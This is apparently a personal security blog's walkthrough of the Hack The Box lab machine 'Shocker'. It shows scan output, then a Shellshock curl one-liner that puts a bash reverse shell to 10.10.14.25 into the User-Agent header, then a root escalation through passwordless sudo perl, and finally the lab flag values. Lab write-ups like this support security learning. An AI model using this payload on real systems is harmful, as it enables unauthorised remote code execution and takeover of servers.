Hacker lair Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.

HTB Shocker Linux

Published on 25 Jun 2019
Enumeration reveals the shocking exploit!.Root will shine as a pearl!

Recon

Nmap scan

CVEs_10.10.10.56.nmap 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
|_ CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Dirbuster scan

Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: /cgi-bin/ - 403
Dir found: / - 200
Dir found: /icons/ - 403

Gobuster scan

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://
10.10.10.56:80/cgi-bin -s 200,204,301,302,307,403 -x sh
/user.sh (Status: 200)

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.56
+ Target Hostname:    10.10.10.56
+ Target Port:        80
+ Start Time:         2019-11-04 16:30:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8673 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2019-11-04 16:34:28 (GMT-5) (234 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Exploitation Shellshock

The target machine is vulnerable to RCI Shellshock After a little bit of research I came accross with a nice and handy one-liner reverse shell to get user.

curl -H "User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.25/5555 0>&1" http://
10.10.10.56/cgi-bin/user.sh

Privilege Escalation

After running LinuxEnum script we find out that we can sudo perl files

[+] We can sudo without supplying a password!
Matching Defaults entries for shelly on Shocker:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/
bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
 (root) NOPASSWD: /usr/bin/perl
[+] Possible sudo pwnage!
/usr/bin/perl

We upload a perl reverse shell and set up nectat to get root!

FLAGS

ROOT "52c2715605d70c7619030560dc1ca467"
USER "2ec24e11320026d1e70ff3e16695b233"

Related posts